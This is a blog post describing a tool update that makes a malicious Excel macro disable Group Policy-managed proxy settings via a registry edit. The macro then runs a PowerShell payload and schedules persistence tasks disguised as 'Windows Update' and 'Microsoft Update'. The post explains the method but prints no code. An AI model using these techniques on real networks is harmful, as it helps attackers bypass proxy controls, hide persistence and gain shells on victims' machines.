New Feature added to Powershell Payload Excel Delivery

To start out, I have to give HUGE credit to @scriptmonkey_ for posting this amazing article. I’m sorry Microsoft didn’t listen to you…hopefully this enforces it a little bit.

**This method is only good for cases where there is a 2nd route out of the network or the organization allows outbound connections outside of the proxy.**

I was lurking on Twitter yesterday when I ran into a retweet of this post. In a nutshell, it describes how you can disable proxy settings that are managed via Group Policy. I have heard (keep in mind, I’m 20 and have no pentest experience) that getting a shell out when there is a proxy in the way can be a little challenging. Because of this, I decided to implement this into both the macro and the persistence task. That way, whenever you want your shell, the proxy will be disabled. Here is how it works:

In most organizations, you will see this on all the workstations:

num1

They have some proxy configured via group policy and disallow any changes. This can be kind of a pain (so I have heard).

*If you want to recreate this, you can find instructions on how to disable changing Automatic Configuration Settings here

So first, let’s create our document. I have updated the Macro code, which has 2 new functions. The first one (Proxy) disables the proxy for the initial shell, and the 2nd one (ProxyKillTask) schedules a task that disables it when the computer is idle for 20 minutes. If the user reboots and the proxy settings return, this will disable it again before your persistent shell kicks off.

1. Create your document using the updated macro provided at https://github.com/enigma0x3/Powershell-Payload-Excel-Delivery/blob/master/MacroForProxies and send it.

2. Now let’s set the scene of the victim. This is going to take place under a non-privileged account with proxy settings managed by Group Policy.

num3

Once the document arrives in the user’s inbox, it will be opened. Once opened, here is what happens:

1.  The first thing the macro does is disable the proxy. It does this before it executes the payload to ensure there is no proxy standing between you and the target.

num5

2. Once disabled, it executes the payload.

num4

3. Once executed, it schedules a task to persist on the machine (called Windows Update). This is nothing new and you can read about it here if you wish to know more.

4. Right after that, it schedules another task and calls it Microsoft Update.

num6

What this task does is simple. It calls powershell.exe to edit the DefaultConnectionSettings key located in HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections. What you need to know is this:

The proxy settings are determined by the 8th place in the data set. If a proxy is on, you will see a value other an 00 or 01. To break this down a little more, the 8th place will show 09 when “Automatically detect Settings” is checked for IE proxy settings:

newnum

Now if you set “Use automatic configuration script” (if there is a .pac or something involved), it will read differently:

num8

What the macro and persistence task do is basically use Powershell to read the contents of the key and then replace the 8th value of the array with a 01. (01 is value for no proxy). After the macro runs, we will find this:

num10

As you can see, this completely disabled the proxy on the machine, allowing for a direct bypass of whatever that proxy was designed for.

I hope you find this useful! I also hope Microsoft get’s their stuff together as this is definitely a security flaw.

-Matt Nelson (@enigma0x3)

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s